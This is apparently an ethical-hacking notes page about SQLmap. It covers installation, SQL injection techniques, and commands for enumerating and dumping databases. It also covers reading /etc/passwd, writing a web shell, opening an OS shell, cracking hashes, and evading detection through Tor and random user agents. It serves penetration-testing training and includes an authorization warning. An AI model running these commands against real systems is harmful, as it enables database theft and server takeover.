SQLmap
SQLmap.md
SQLmap
Overview
SQLmap is an open-source tool that automates the detection and exploitation of SQL injection vulnerabilities in web applications. It can fingerprint databases, extract data, access the underlying file system, and even execute OS commands — all through SQL injection flaws.
Category
#gaining-access #web-exploitation #sql-injection
Phase
Gaining Access
Developer
Bernardo Damele A.G. & Miroslav Stampar — sqlmap.org GitHub: github.com/sqlmapproject/sqlmap
Install
# Kali Linux — pre-installed
sqlmap --version
# Manual install
git clone https://github.com/sqlmapproject/sqlmap.git
python3 sqlmap/sqlmap.py --version
Supported Databases
MySQL, PostgreSQL, Microsoft SQL Server, Oracle, SQLite, IBM DB2, Firebird, SAP MaxDB, Sybase, and more.
SQL Injection Techniques
| Code | Technique |
|---|---|
| B | Boolean-based blind |
| E | Error-based |
| U | UNION query-based |
| S | Stacked queries |
| T | Time-based blind |
| Q | Inline queries |
Basic Usage
# Test a URL parameter for SQLi
sqlmap -u "http://target.com/page.php?id=1"
# Specify POST data
sqlmap -u "http://target.com/login.php" \
--data="username=admin&password=test"
# Test with cookie (authenticated scan)
sqlmap -u "http://target.com/page.php?id=1" \
--cookie="PHPSESSID=abc123"
# Use a saved HTTP request from Burp Suite
sqlmap -r request.txt
# Specify parameter to test
sqlmap -u "http://target.com/page.php?id=1&cat=2" -p id
Enumeration Commands
# Get database banner/version
sqlmap -u "http://target.com/?id=1" --banner
# List databases
sqlmap -u "http://target.com/?id=1" --dbs
# List tables in a database
sqlmap -u "http://target.com/?id=1" -D dbname --tables
# List columns in a table
sqlmap -u "http://target.com/?id=1" -D dbname -T tablename --columns
# Dump a table
sqlmap -u "http://target.com/?id=1" -D dbname -T tablename --dump
# Dump everything (careful — can be huge)
sqlmap -u "http://target.com/?id=1" --dump-all
# Get current DB user
sqlmap -u "http://target.com/?id=1" --current-user
# Get current database
sqlmap -u "http://target.com/?id=1" --current-db
# Check if current user is DBA
sqlmap -u "http://target.com/?id=1" --is-dba
Advanced / Post-Exploitation
# Read a file from the server (requires FILE privilege)
sqlmap -u "http://target.com/?id=1" --file-read="/etc/passwd"
# Write a web shell (requires write access + --os-shell or manual)
sqlmap -u "http://target.com/?id=1" \
--file-write="shell.php" \
--file-dest="/var/www/html/shell.php"
# Interactive OS shell (if DB user has exec privileges)
sqlmap -u "http://target.com/?id=1" --os-shell
# Crack extracted hashes automatically
sqlmap -u "http://target.com/?id=1" -D dbname -T users --dump \
--passwords
Key Flags
| Flag | Description |
|---|---|
--level=N |
Test intensity (1–5, default 1) |
--risk=N |
Risk level (1–3, default 1; higher may modify data) |
--technique=BEUSTQ |
Which SQLi techniques to use |
--dbms=mysql |
Force a specific DB type |
--threads=N |
Parallel requests (default 1) |
--batch |
Non-interactive; accept defaults |
--random-agent |
Randomize User-Agent header |
--tor |
Route through Tor |
--proxy |
Use HTTP proxy (e.g., Burp Suite) |
--forms |
Auto-detect and test HTML forms |
--crawl=N |
Crawl site N levels deep |
Using with Burp Suite
1. Intercept request in Burp → Save to file (e.g., request.txt)
2. sqlmap -r request.txt --level=3 --risk=2
OPSEC Notes
SQLmap is noisy and will trigger WAFs and IDS. Use
--delay,--random-agent, and--torfor stealth. Never run against a target without written authorization. Setting--risk=3can cause data modification — use carefully.
Related Tools
- Metasploit — Can use SQLmap output; has its own SQLi modules
- Hydra — If SQLi reveals credentials, use Hydra for related services
- Nmap — Identify web servers before running SQLmap
- Nessus / OpenVAS — May flag SQL injection points for you to confirm with SQLmap
Tags
#ethical-hacking #gaining-access #web-exploitation #sql-injection #database